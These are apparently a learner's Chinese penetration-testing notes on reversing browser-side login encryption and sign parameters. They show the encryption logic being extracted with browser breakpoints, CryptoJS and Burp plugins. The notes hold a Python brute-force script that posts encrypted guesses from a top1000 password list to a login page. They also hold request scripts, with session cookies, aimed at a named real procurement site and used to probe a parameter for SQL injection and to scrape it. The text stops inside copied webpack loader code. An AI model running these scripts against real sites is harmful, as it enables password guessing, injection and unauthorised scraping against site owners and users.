先讲死:逆向就是复现加密的过程,直接右键密码处拿元素名去搜索定位登录文件------>给ai定位加密函数------>进入到加密函数源码处。输入账号密码断点传值。 看到key,iv等露出来。就可以用了
全网贯穿:通过html元素,定位源码里面加密函数,传值露出 key,iv,,
看html payload /看不见就抓包看提交上去的密码是否是加密显示 是逆向
扣代码是因为加密算法轻量刚好内嵌的登录文件,复杂一点的放在单独一个文件。
浏览器
Elements元素检索
全局搜索:Ctrl+F
Console
调出控制台:ESC
函数获取:function pwd() { } ,粘贴pwd控制台回车
局部搜索:Ctrl+F
Sources
断点?程序运行到这时自动顿住 需要你手动下一步 #看函数怎么走
调试断点: 点击。 函数处下不了断点, 函数下方点击
执行断点:刷新登录页面, 断点处自动停住
取消断点: ✔ \
全局搜索资源文件:右上角三点处 Search , 扣getElementById搜索
局部搜索:Ctrl+F
代码折叠:✔Code folding ,简化复制
》 : 浏览器编写js脚本代码执行 1.js
#也可以加关键字调试
Network
网络请求
选项卡:Preserve log (保留历史请求)✔Disable cache (最新请求) No throttling
过滤:
局部搜索:Ctrl+F
输入账号密码,网络刷新。
post 200 wp-login.php文件: Payload请求正文 ,admin 123456(显示)
Application
存储
《实站:公共号登录加密 - 逆向MD5加密算法》
思路:登录找long、post
猜测MD5加密:e10adc3949ba59abbe56e057f20f883e 但无学习意义
思路:抓包见加密显示逆向,接口标识?action=xxx
分析加密算法
1.页面元素复制password参数
Elements: password
2.Search:password
3.longxxx.js copy ai 锁定加密函数
- 也可以看调用栈Initiator
password经过的调用栈,之前是post@ login@ 现在改了但依旧离不开"登录"
扣longxxx.js
- 得到加密函数-扣代码
- 加密函数改立即执行函数。
开头: 1. 定义全局变量函数var getSrt 2. 添加!变成立即执行函数。
结尾: 1.全局变量函数/替换内部变量函数(让外部能调用这个加密函数);
getSrt (已替换)= function(t, p, n) +删逗号后,加()闭合语法
最后:console.log(getSrt("123456")); 手动输入 123456 调用对比验证加密逻辑是否还原正确
5.1调用立即执行函数
*MD5加密
直接拿这个加密函数来调用就行了
公众号登录密文的分析+脚本扣下来了+正常调用 = 完了
利用
没有验证码
直接登录。
有验证码
查看能不能绕过。能绕过写脚本一起提交就可以了。
CryptoJS加密库
为什么使用加密库? 好不用扣代码。
crypto-js是谷歌开发的一个纯JavaScript的加密算法类库,可以非常方便的在前端进行其所支持的加解密操作。目前crypto-js已支持的算法有:MD5、SHA-1、SHA-256、AES、RSA、Rabbit、MARC4、HMAC、MD5、HMAC-SHA1、HMAC-SHA256、PBKDF2等。使用时可以引用总文件,也可以单独引用某一文件。
解决:不用断点找到加密函数扣代码调用,直接调用这个库就行了,方便。
加密库加密流程
- 安装加密库
bash
npm install crypto-js- 新建xxx.js文件,引入加密库
bash
const CryptoJS = require('crypto-js'); //引入库- xxx.js文件调用加密库.加密算法加密
javascript
const CryptoJS = require('crypto-js');//引入库
//md5加密
var str = "123456"
var eMD5=CryptoJS.MD5(str).toString()
console.log(eMD5)
//SHA256
var eSHA256=CryptoJS.SHA256(str).toString()
console.log(eSHA256)
//SHA512
var eSHA256=CryptoJS.SHA512(str).toString()
console.log(eSHA256)
//base64编码
var name = "邓123!"; //加密
var tmp = CryptoJS.enc.Utf8.parse(name); //转utf8
var base64Str = CryptoJS.enc.Base64.stringify(tmp); //转base64
console.log(base64Str); // RGVuZw==
//base64解码
var words = CryptoJS.enc.Base64.parse(base64Str); //转base64
var parseStr = CryptoJS.enc.Utf8.stringify(words); //转utf8
console.log(parseStr); // 邓123!
//aes对称加密
//密钥
const key = CryptoJS.enc.Utf8.parse("1234123412ABCDEF"); //16位16进制数,密钥
//偏移量
const iv = CryptoJS.enc.Utf8.parse('ABCDEF1234123412'); //16位16进制数,密钥偏移量
//加密
function Encrypt(word) {
let a1 = CryptoJS.enc.Utf8.parse(word); //转码utf8
let b1 = CryptoJS.AES.encrypt(a1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7 }); // 加密 传入key iv 模式
return b1.ciphertext.toString().toUpperCase();
}
//解密
function Decrypt(word) {
let a1 = CryptoJS.enc.Hex.parse(word);
let b1 = CryptoJS.enc.Base64.stringify(a1); //转码base64
let f = CryptoJS.AES.decrypt(b1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7 }); //解密
let g = f.toString(CryptoJS.enc.Utf8); //解密结果转码utf8转字符
return g;
}
var m=Encrypt("123456")
console.log(m) //0FA00516C7FA7350DED84B110C438F04
var n=Decrypt(m)
console.log(n) //123456工具:WT-JS-1.8.3
*AES对称加密-密钥偏移量
*rsa非对称加密解密-公私钥
2.安装另一个加密库:npm install jsencrypt
3.新建rsa.js,引入加密库
4.密钥去掉换行:TXT文本处理工具 - 在线文本工具 加密解密也可以在这个网站一步到位
- 无法在windows执行:bin目录 jsencrypt.js, 头行添加 window = global
6.运行:node xxx.js
javascript
//引入加密库
const JSEncrypt = require('jsencrypt');
//公钥私钥对
var PUBLIC_KEY = '生成的公钥'
var PRIVATE_KEY = '生成的私钥'
var encrypt = new JSEncrypt();
//设置公钥
encrypt.setPublicKey('-----BEGIN PUBLIC KEY-----' + PUBLIC_KEY + '-----END PUBLIC KEY-----');
//数据json
var str = {
"uid":"admin",
"pwd":"123456"
}
//公钥加密
var encrypted = encrypt.encrypt(JSON.stringify(str));
console.log('加密前数据:%o', str);
console.log('加密后数据:%o', encrypted);
//私钥解密
var decrypt = new JSEncrypt();
decrypt.setPrivateKey('-----BEGIN RSA PRIVATE KEY-----'+PRIVATE_KEY+'-----END RSA PRIVATE KEY-----');
var uncrypted = decrypt.decrypt(encrypted);
console.log('解密后数据:%o', uncrypted);
《实战登录加密- 逆向AES加密算法》
网站:http://oa.xxxx.com/login.jsp
1.谷歌:输入 admin 123456 ,f12网络。重要把登录点的xxxlogin.js相关文件跑下来
- 观察表单payload,admin /xxxxxx 核心验证是否加密显示? 屏蔽了表单情况
3.火狐:输入 admin 123456,f12网络。插件HTTP Header Live抓包。看见加密显示了。好逆向
3.search搜索字段:j_username(右键页面name= 也能看见这字段)
4.j_username出现在就是 login.jsp,login.jsp就是登录点核心加密文件。
5.最新方法:让ai找加密函数。desEncrypt()
javascript
function encryptPassword(){
// 这一行是加密核心:把密码框的明文密码传入desEncrypt函数加密后,重新赋值给密码框
document.forms[0].j_password.value = desEncrypt(document.forms[0].j_password.value);
}
javascript
desEncrypt() 函数不在当前代码里,而是通过这行代码引入的:
Com_IncludeFile("security.js"); // 加密逻辑写在security.js文件中
你需要找到 security.js 文件才能看到 desEncrypt() 的具体实现(比如 AES 加密的密钥、模式、补位方式等)。
要完全复现加密,需要拿到 security.js 里的:
密钥(key)
加密模式(如 ECB/CBC)
填充方式(如 PKCS#5/PKCS#7)
编码方式(如 Base64 / 十六进制)
可以代码ai拿到/也可以控制台拿到:
密钥(key/iv) SECURITYKEY.get()/_2() 方法;浏览器 Network 看session.jsp或 Console 执行SECURITYKEY.get()
加密模式 desEncrypt 函数中 encrypt 配置传 iv → 确认是 CBC 模式
填充方式 代码未指定 padding → 默认为 PKCS7(CryptoJS 规则)
编码方式 encrypt(...).toString() → 确认是 Base64 编码6.在desEncrypt下断点,输入admin/123456回车,停住。
7.进到desEncrypt这个加密函数。调出控制台:ESC。输入desEncrypt回车。点击内容
或者光标放上desEncrypt。也可以进到加密函数。
8.进入到加密函数文件。断点。如表单值传过来。看怎么走。看密钥、偏移量显示是多少?
9.密钥key跟偏移量iv看到了 就变很简单了。1.直接拿Cryto_JS加密库来用 2.扣代码 3.WT-JS-1.8.3工具(推荐) 4.TXT文本处理工具 - 在线文本工具 (推荐)
10.先取加密点
11.打开WT-JS-1.8.3,传入key,iv。
- 工具生成当前js脚本,复制到idea,拼接前缀就好了。
如果结果和抓包不一致?
本地结果:gIDASklcyJv5BtSiIG/NOA== 是「加密后二进制数据」的 Base64 编码结果;
抓包结果:We+lQQFxWERx54UjB78u7Q== 和这个是同一类东西,因为密钥 /iv 不同
差异原因:
抓包 + 断点的操作,会触发两次密钥请求生成,导致 key/iv 不一致,这才是结果对不上的核心原因。但是没有问题。
提示:这个rsa跟aes逆向 多了光标进入到单独的加密函数文件?
MD5 /SHA1因为算法简单、体积小,经常被直接内嵌到业务文件(比如登录 JS)里;而 RSA/AES 算法复杂、代码量大,几乎都会单独拆成独立文件,所以你能点进去看地址,MD5 嵌在登录文件里可以直接扣下来。
《实战登录加密 - 逆向sha1加密算法 - 逆向sign》
先讲死:sign == 提交的明文数据 +密文套壳
sign : 验证数据完整性
提交数据时,+sign做套壳。
该网站的,计算生成一个sign = 整体哈希算法.(拼接明文账号密码 + 时间戳 + 固定盐值)
- 我们看到明文的密码+时间戳+sign。不像前面的密文密码
sing值怎么来? 对提交的参数加密完之后,再产生一个sign值。
修改两次提交sign认证不通过,ip噶了。
深入测试,分析这个参数sign是怎么生成的。
1.提交抓包正文:{"username":"xxx","password":"xxx","timestamp":xxx,"sign":"xxx"}
2.Search: sign。这样找不到,找传值
3.Search:\.sign(搜索.sign),断点
RO之后有sign值了,但不一致
提交时间戳不一样,每一次提交的sign值就不一样。
跟进RO函数,下断点。执行一下
跟进hex函数,下断点。执行一下
最终我们看到,r函数就是SHA1的加密。
打开工具,复刻加密流程。
修改密码,加密。提交。不会进行拦截。
扣到idea调用
burp前端jsEncrypter插件使用
jsEncrypter:思路就是先加密、批量爆破
1.网站模现http://xxxx/jscom/
- search :id = "password"
- AES_Encrypt加密函数
- 进入加密函数,加密流程
5.断点
6.(略过) 点击生成当前方案js脚本 命名为aes.js (配合下面jsEncrypter插件用)
1.jsEncrypter 下载网址 :https://github.com/c0ny1/jsEncrypter/releases
2.下载插件后从burp导入插件即可。
还需要一个 phantomjs.exe 单独的js运行环境
修改 phantomjs_server.js服务。1.引入aes.js 2.调用aes里面加密函数AES_Encrypt
启动js服务 # 目录cmd >phantomjs.exe phantomjs_server.js
#重发测试,插件连接js服务器
#爆破测试
解码
插件日志找到密码
去网址登录页面 输入 admin 666666 登录
python手动编码执行JS登录测试
不想使用jsEncrypter这种工具 ,还可以自己编写测试代码。
前面文档aes.js文件。
现在改为用python去执行这个加密脚本文件。
- 需要2个依赖库:pip install pyexecjs2 pip install requests
python
------------自己根据实际情况改------------
# -*- coding:utf-8 -*- # 声明文件编码UTF-8,避免中文乱码
import requests # requests库:发HTTP请求
import execjs # execjs库:执行JS
# 定义加密函数:输入明文密码,返回加密后的密文
def getStr(p):
with open('aes.js','r',encoding='utf-8') as f: # aes.js加密脚本文件
js_code = f.read() # 读取
f.close() # 关闭
data = execjs.compile(js_code).call('AES_Encrypt',p) # 调用AES_Encrypt函数
return data # 8. 返回加密后的密文
# 核心逻辑:批量测试密码
with open("top1000.txt","r") as pwds: # 文件
pwd = pwds.readlines() # 读取
for p in pwd: # 遍历
passwd = getStr(p.strip()) # 去空格/换行,getStr()加密
res=requests.post(url="http://www.jsdemo.com/login.php",data={"username":"admin","password":passwd}) #请求
print("正在测试密码: "+ p +"加密: "+passwd)
if "~" in res.text: # 登录成功 取的是~
print("密码是: "+ p) # 正确密码,打印
break - Sublime Tex 测试
burp前端BurpCryp插件使用
jsEncrypter 完全可以搞定大部分前端加密爆破
- 依赖 PhantomJS/Node 启动一个独立 JS 服务,Burp 通过 HTTP 调用加密逻辑。
- 适合固定加密算法(比如你现在的 AES),但每次改加密逻辑都要重启服务。
BurpCrypto 是给更复杂 / 更灵活场景准备的「进阶方案」
- 直接在 Burp 内部执行 JS / 加密算法,不需要额外启动服务,更轻量。
- 内置 RSA/AES/DES 等常用模块,简单加密直接点选就能用,不用写 JS 脚本。
- 复杂加密用
ExecJS模块,直接在 Burp 里写处理代码,和我们手写Python+exe.js 思路一致,但集成在 Burp 里,不用写独立脚本。
很多网站现在会:动态密钥 / 复杂逻辑更顺手
- 每次请求前动态生成加密密钥(比如从 Cookie / 响应头里取)
- 加密逻辑里依赖浏览器环境变量 (比如
window.location、时间戳) - 多步骤加密(先 MD5 再 AES,再 Base64)
jsEncrypter 要处理这些,需要把完整逻辑写到 phantomjs_server.js 里,重启服务;BurpCrypto 可以在 Burp 里直接写 JS 代码,实时调试,更灵活。
- 抓包发送到Intruder
2.设置插件
3.设置Payload
- 攻击完结
5.主要看自定义js
6.重新设置Payload
7.还可以把前面python执行的 aes.js加密脚本拿过来
复制粘贴
这个调用错了。变成调用解密函数了。加密函数在解密函数上面。AES_Encrypt
8.再重新设置Payload
逆向webpack加密算法
webpack 一个静态模块打包器。webpack加载器 主要作用的 加载js模块运行
注意:我们是渗透测试,不是搞开发的,理解调用流程就可以了。
webpack加载器
webpack加载器 主要作用的 加载js模块运行
函数(形参){加载器}([])
函数(形参){加载器}({})
!是一个自执行函数 ,e就我们传入的参数可以是数组 或者 对象
javascript
#它的加载器函数一般长这样
!function(e){
var t={} // 模块缓存池
function d(n){ // 核心加载函数
if (t[n]) // 缓存命中,直接返回
return t[n].exports;
console.log(n)
var r = t[n] = { // 初始化模块对象
i:n, // 模块ID
l:!1, // 加载状态:false=未完成
exports:{} // 模块导出内容
};
return e[n].call(r.exports,r,r.exports,d),
r.l = !0;
r.exports
}
#通过调用 索引0 是function1
d(0)
}( #加载列表
[
function(){console.log("function1");},
function(){console.log("function2")}
]
);
javascript
(function(e){
var t={} // 模块缓存池
function d(n){ // 核心加载函数
if (t[n]) // 缓存命中,直接返回
return t[n].exports;
console.log(n)
var r = t[n] = {
i:n, #可以直接搜索这个函数i:
l:!1,
exports:{} #可以直接搜索这个函数exports:
};
return e[n].call(r.exports,r,r.exports,d),
r.l = !0;
r.exports
}
d("func2")
}( #加载对象
{
func1:function (){
console.log("function1")
},
func2:function (){
console.log("function2")
},
}
)
);插件wappalyzer
《实战 数据提交webpack 加密算法》
https://ec.xxxx.com.cn/open/home/purchase-info
我们看到提交下一页,访问存在两个请求 一个是获取公钥 一个是获取公钥之后加密的参数
- 核心流程:先从服务端获取加密公钥 → 用公钥加密请求参数(页码) → 携带加密参数请求业务接口 → 获取并输出数据。
- 关键依赖 :
webpack.js中的getStr函数是加密核心,必须保证该 JS 代码能正常执行,且公钥传递无误
全局搜索 /homepage/public 定位 获取公钥
- 分析采购处,提交下一页参数加密流程
#全局搜索公钥url
返回值处断点,找到之后发现存在加密
javascript
B.a.post("/open/homepage/public"); //获取公钥
case 4:
return n = A.sent,
r = n.data,
t.setPublicKey(r), //设置公钥
a = m(m({}, e), {}, {
sign: f()(JSON.stringify(e)),
timeStamp: +new Date
}),
s = t.encryptLong(JSON.stringify(a)),
A.abrupt("return", s);
公钥网址往上走
#s是 a对象 经过 encryptLong加密后内容,a的内容是对象 发现 存在 sign
#看参数往上走,看到? = ?new d[' '];. 找这个d从哪里来
#找到d承载的加载器,断点定位#
找到加载器函数
#扣出整个包含加载器代码
1.尾部闭合
- global全局对象模拟浏览器window对象
javascript
不行则改为
window = typeof window !== 'undefined' ? window : global; // 仅加这1行!3.传入我们的对象
- 定义全局函数 然后在函数里面把O赋值过来就可以了
抠代码还原rsa加密算法
思路先讲死:先扣整个webpack加载器,下面扣公钥加密逻辑。然后缺哪个模块补哪个。找那个函数 ,下断点,传值过来了再找。不然细节问题导致里面呈现的值找不对
- 扣出公钥
2.处理公钥加密函数
4.缺少模块,打印一下O函数错误模块名
5.函数未定义
看到sign,B()函数。 看到B()是MD5。 可以验证一下
用MD5调用库替换掉B()
补w
补V
补b
逆向成功!
关键代码解析
公钥设置与加密参数
javascript
t = new d["a"]
r = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDc9lmemqo8kWcTTiiz3eXrHzTBh4SBQQ2eP2l2oBBdYu1iKts8Fx2fkvnOZECtPkpbNEVJtOqTam7pYIz1yVAGvbrxMppgqsP0j+LSbbEpwMpfIXGZK8gc0t/BgSndvTu+dri/YMeqNdYsSwCPzIvee7PEE9lZyueUtlxK5moPhwIDAQAB"
t.setPublicKey(r), // 设置公钥 :公钥是标准的 PKCS#8 格式 Base64 编码
//构造加密参数:加密参数包含业务字段 + 签名 + 时间戳,符合常规接口加密规范
// 业务字段
e ={
"inviteMethod": "",
"businessClassfication": "",
"mc": "",
"lx": "ZBGG",
"dwmc": "",
"pageIndex": 2
}
// 签名和时间戳
a = m(m({}, e), {}, {
sign: generateMD5Hash(JSON.stringify(e)),
timeStamp: +new Date
}),
// 执行分段加密
s = t.encryptLong(JSON.stringify(a))
//最后输出结果
//console.log(s) 逆向到最后一步才添加调用js执行安全测试或爬虫
加密字符串 有啥用?
流程: 点击下一页,数据rsa+sign加密提交到后台,服务器解密+sign对比
正确,则带入查询如果是数据库查询。 提交查询字段有漏洞会造成 ,sql/命令执行等。
javascript
e ={
"inviteMethod": "",
"businessClassfication": "",
"mc": "",
"lx": "ZBGG",
"dwmc": "",
"pageIndex": 2
}- webpack.js去掉所有输出,把这段js封装成getStr()函数调用
javascript
//注释r,因为每次访问都会问r 获取公钥 再进行加密。获取公钥这个操作让python完成。
function getStr(r,p){
t.setPublicKey(r)
e={
"inviteMethod": "",
"businessClassfication": "",
"mc": "",
"lx": "ZBGG",
"dwmc": "",
"pageIndex": p //页数
}
a = m(m({}, e), {}, {
sign: generateMD5Hash(JSON.stringify(e)),
timeStamp: +new Date
}),
s = t.encryptLong(JSON.stringify(a))
return s
}
console.log(getStr(r,20))
用python脚本获取公钥
1.public文件右键,选择bash 访问 https://curlconverter.com/python/ 将提交信息转为python脚本
2.命名webpack.py。工具-立即编译(运行)
python
import requests
//可以删掉headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36',
'Referer': '',
}
//删掉response = requests.get('chrome-extension://gppongmhjkpfnbhagpmjfkannfbllamg/js/js.js', headers=headers)
cookies = {
'__jsluid_s': '0cdf7560df2ff035a6820b841ab080fb',
'SUNWAY-ESCM-COOKIE': '997e3ea9-05b5-471e-9ec7-5aca3312689d',
'authenticated': 'true',
'user_role': 'admin',
'session_valid': 'true',
'is_logged_in': 'true',
'admin_access': 'true',
'JSESSIONID': 'CA2B1E3FCCDAE7265748E1B1689187A6',
}
headers = {
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
# 'Content-Length': '0',
'Origin': 'https://ec.minmetals.com.cn',
'Pragma': 'no-cache',
'Referer': 'https://ec.minmetals.com.cn/open/home/purchase-info',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36',
'sec-ch-ua': '"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
# 'Cookie': '__jsluid_s=0cdf7560df2ff035a6820b841ab080fb; SUNWAY-ESCM-COOKIE=997e3ea9-05b5-471e-9ec7-5aca3312689d; authenticated=true; user_role=admin; session_valid=true; is_logged_in=true; admin_access=true; JSESSIONID=CA2B1E3FCCDAE7265748E1B1689187A6',
}
response = requests.post('https://ec.minmetals.com.cn/open/homepage/public', cookies=cookies, headers=headers)
//补上两行
print(response)
print(response.text)
3.python脚本封装成一个函数
python
import requests
def getPublicKey():
cookies = {
'__jsluid_s': '0cdf7560df2ff035a6820b841ab080fb',
'SUNWAY-ESCM-COOKIE': '997e3ea9-05b5-471e-9ec7-5aca3312689d',
'authenticated': 'true',
'user_role': 'admin',
'session_valid': 'true',
'is_logged_in': 'true',
'admin_access': 'true',
'JSESSIONID': 'CA2B1E3FCCDAE7265748E1B1689187A6',
}
headers = {
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
# 'Content-Length': '0',
'Origin': 'https://ec.minmetals.com.cn',
'Pragma': 'no-cache',
'Referer': 'https://ec.minmetals.com.cn/open/home/purchase-info',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36',
'sec-ch-ua': '"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
# 'Cookie': '__jsluid_s=0cdf7560df2ff035a6820b841ab080fb; SUNWAY-ESCM-COOKIE=997e3ea9-05b5-471e-9ec7-5aca3312689d; authenticated=true; user_role=admin; session_valid=true; is_logged_in=true; admin_access=true; JSESSIONID=CA2B1E3FCCDAE7265748E1B1689187A6',
}
response = requests.post('https://ec.minmetals.com.cn/open/homepage/public', cookies=cookies, headers=headers)
#返回响应结果
return response.text
#调用函数
print(getPublicKey())
1.回到webpack.js 复制文件路径
C:\Users\Deng\Desktop\js逆向\js\webpack.js
2.在webpack.py 编加执行js代码
javascript
//路径跟函数换成你的
with open(r'C:\Users\Deng\Desktop\js逆向\js\webpack.js','r',encoding='utf-8') as f:
js_code = f.read();
data = execjs.compile(js_code).call('getStr',public_key,1)
print(data)
python
import requests
import execjs //安装这两个模块
def getPublicKey():
cookies = {
'__jsluid_s': '0cdf7560df2ff035a6820b841ab080fb',
'SUNWAY-ESCM-COOKIE': '997e3ea9-05b5-471e-9ec7-5aca3312689d',
'authenticated': 'true',
'user_role': 'admin',
'session_valid': 'true',
'is_logged_in': 'true',
'admin_access': 'true',
'JSESSIONID': 'CA2B1E3FCCDAE7265748E1B1689187A6',
}
headers = {
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
# 'Content-Length': '0',
'Origin': 'https://ec.minmetals.com.cn',
'Pragma': 'no-cache',
'Referer': 'https://ec.minmetals.com.cn/open/home/purchase-info',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36',
'sec-ch-ua': '"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
# 'Cookie': '__jsluid_s=0cdf7560df2ff035a6820b841ab080fb; SUNWAY-ESCM-COOKIE=997e3ea9-05b5-471e-9ec7-5aca3312689d; authenticated=true; user_role=admin; session_valid=true; is_logged_in=true; admin_access=true; JSESSIONID=CA2B1E3FCCDAE7265748E1B1689187A6',
}
response = requests.post('https://ec.minmetals.com.cn/open/homepage/public', cookies=cookies, headers=headers)
#返回响应结果
return response.text
#给公钥值
public_key = getPublicKey()
#执行
with open(r'C:\Users\Deng\Desktop\js逆向\js\webpack.js','r',encoding='utf-8') as f:
js_code = f.read();
data = execjs.compile(js_code).call('getStr',public_key,1)
print(data)python脚本已拿到提交的加密参数
4.再进行一次页面访问。继续生成python脚本
5.这个python请求已经完成了。首先py获取key然后调用webpack.js文件。然后调用webpack.js文件getStr函数
python
import requests
import execjs
-----------------------------一共两个请求文件--------------
#这是Public请求
def getPublicKey():
cookies = {
'__jsluid_s': '0cdf7560df2ff035a6820b841ab080fb',
'SUNWAY-ESCM-COOKIE': '997e3ea9-05b5-471e-9ec7-5aca3312689d',
'authenticated': 'true',
'user_role': 'admin',
'session_valid': 'true',
'is_logged_in': 'true',
'admin_access': 'true',
'JSESSIONID': 'CA2B1E3FCCDAE7265748E1B1689187A6',
}
headers = {
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
# 'Content-Length': '0',
'Origin': 'https://ec.minmetals.com.cn',
'Pragma': 'no-cache',
'Referer': 'https://ec.minmetals.com.cn/open/home/purchase-info',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36',
'sec-ch-ua': '"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
# 'Cookie': '__jsluid_s=0cdf7560df2ff035a6820b841ab080fb; SUNWAY-ESCM-COOKIE=997e3ea9-05b5-471e-9ec7-5aca3312689d; authenticated=true; user_role=admin; session_valid=true; is_logged_in=true; admin_access=true; JSESSIONID=CA2B1E3FCCDAE7265748E1B1689187A6',
}
response = requests.post('https://ec.minmetals.com.cn/open/homepage/public', cookies=cookies, headers=headers)
#返回响应结果
return response.text
#给公钥值
public_key = getPublicKey()
#执行
with open(r'C:\Users\Deng\Desktop\js逆向\js\webpack.js','r',encoding='utf-8') as f:
js_code = f.read();
data = execjs.compile(js_code).call('getStr',public_key,1)
#这是by-lx-page请求
#响应结果
def getResult(date): #传入请求date
cookies = {
'__jsluid_s': '0cdf7560df2ff035a6820b841ab080fb',
'SUNWAY-ESCM-COOKIE': '997e3ea9-05b5-471e-9ec7-5aca3312689d',
'authenticated': 'true',
'user_role': 'admin',
'session_valid': 'true',
'is_logged_in': 'true',
'admin_access': 'true',
'JSESSIONID': '37CC1B6941965975D38BECAAEAD3D49F',
}
headers = {
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive',
'Content-Type': 'application/json',
'Origin': 'https://ec.minmetals.com.cn',
'Pragma': 'no-cache',
'Referer': 'https://ec.minmetals.com.cn/open/home/purchase-info',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36',
'sec-ch-ua': '"Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Windows"',
# 'Cookie': '__jsluid_s=0cdf7560df2ff035a6820b841ab080fb; SUNWAY-ESCM-COOKIE=997e3ea9-05b5-471e-9ec7-5aca3312689d; authenticated=true; user_role=admin; session_valid=true; is_logged_in=true; admin_access=true; JSESSIONID=37CC1B6941965975D38BECAAEAD3D49F',
}
json_data = {
'param': date,
}
response = requests.post(
'https://ec.minmetals.com.cn/open/homepage/zbs/by-lx-page',
cookies=cookies,
headers=headers,
json=json_data,
)
#内容返回
return response.json()
#输出
print(getResult(data))
最后测试 wevpack.js 修改 webpack.py 运行
测试接收参数 是否安全 例如 zbgg 是否存在注入 可用加上 引号 加密提交即可
javascript
e={
"inviteMethod": "",
"businessClassfication": "",
"mc": "",
"lx": "ZBGG ' ", //输入' 输入' and 1=1
"dwmc": "",
"pageIndex": p
}只是获取不到信息 并没有报
写成爬虫
1.先看一下 到底有多少页?
把webpack.js 页数 2改成p
webpack.js
javascript
window = typeof window !== 'undefined' ? window : global; // 仅加这1行!
var loader ;
const crypto = require('crypto');
function generateMD5Hash(data) {
const hash = crypto.createHash('md5');
hash.update(data);
return hash.digest('hex');
}
(function(A) {
function e(e) {
for (var n, r, i = e[0], o = e[1], c = e[2], g = 0, C = []; g < i.length; g++)
r = i[g],
Object.prototype.hasOwnProperty.call(a, r) && a[r] && C.push(a[r][0]),
a[r] = 0;
for (n in o)
Object.prototype.hasOwnProperty.call(o, n) && (A[n] = o[n]);
I && I(e);
while (C.length)
C.shift()();
return s.push.apply(s, c || []),
t()
}
function t() {
for (var A, e = 0; e < s.length; e++) {
for (var t = s[e], n = !0, r = 1; r < t.length; r++) {
var i = t[r];
0 !== a[i] && (n = !1)
}
n && (s.splice(e--, 1),
A = o(o.s = t[0]))
}
return A
}
var n = {}
, r = {
index: 0
}
, a = {
index: 0
}
, s = [];
function i(A) {
return o.p + "js/" + ({}[A] || A) + ".js"
}
function o(e) {
if (n[e])
return n[e].exports;
var t = n[e] = {
i: e,
l: !1,
exports: {}
};
return A[e].call(t.exports, t, t.exports, o),
t.l = !0,
t.exports
}
o.e = function(A) {
var e = []
, t = {
"chunk-014f8c76": 1,
"chunk-0799cf5c": 1,
"chunk-0e71e1ec": 1,
"chunk-25e02724": 1,
"chunk-292fc281": 1,
"chunk-2cd90a65": 1,
"chunk-36ad665a": 1,
"chunk-3840b198": 1,
"chunk-390aea64": 1,
"chunk-42205bc8": 1,
"chunk-426d5d53": 1,
"chunk-4cf78788": 1,
"chunk-5f41017c": 1,
"chunk-6038e544": 1,
"chunk-60daba61": 1,
"chunk-61880a06": 1,
"chunk-6a5f7ce2": 1,
"chunk-6a6e0a4d": 1,
"chunk-6b845cb2": 1,
"chunk-6ced383c": 1,
"chunk-6e193751": 1,
"chunk-6f9084b2": 1,
"chunk-71fba83c": 1,
"chunk-72c3d136": 1,
"chunk-73322c15": 1,
"chunk-79ab910b": 1,
"chunk-7ddeb4f7": 1,
"chunk-84f3bc8a": 1,
"chunk-87c5890c": 1,
"chunk-90be71c6": 1,
"chunk-aedb4c38": 1,
"chunk-b6059616": 1,
"chunk-b8947556": 1,
"chunk-f12ed69e": 1,
"chunk-fda268a2": 1
};
r[A] ? e.push(r[A]) : 0 !== r[A] && t[A] && e.push(r[A] = new Promise((function(e, t) {
